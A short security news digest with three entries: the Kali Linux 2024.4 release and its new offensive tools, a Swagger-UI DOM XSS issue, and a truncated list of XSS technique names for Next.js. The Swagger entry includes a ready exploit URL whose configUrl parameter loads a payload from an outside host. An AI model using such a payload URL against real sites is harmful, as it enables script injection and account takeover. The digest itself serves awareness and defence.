December 18, 2024 at 11:20AM

■■■□□ Kali Linux has released version 2024.4, introducing 14 new tools, deprecating certain features, and implementing various improvements.

New Tools:
– bloodyad: Active Directory privilege escalation framework.
– certi: Tool for requesting certificates from Active Directory Certificate Services (ADCS) and discovering templates.
– chainsaw: Utility for rapidly searching and analyzing Windows forensic artifacts.
– findomain: Fast and comprehensive domain…

December 17, 2024 at 01:21AM

Swagger-UI DOM XSS via DOMPurify library.
example.tld/swagger/index.html?configUrl=https://xss.smarpo.com/test.json
https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/
https://t.me/cKure/15027

December 15, 2024 at 11:40AM

■■■□□ Lesser-known XSS payloads that work with Next.js
Source: Twitter | TheYasinSpace
– Dynamic CSS injection XSS
– CSS Variable injection XSS
– Object Literal injection XSS
– CSS Flexbox injection XSS
– Unicode Character injection XSS
– Dynamic Font injection XSS
– CSS Animation injection XSS
– Web Font injection XSS
– CSS Grid…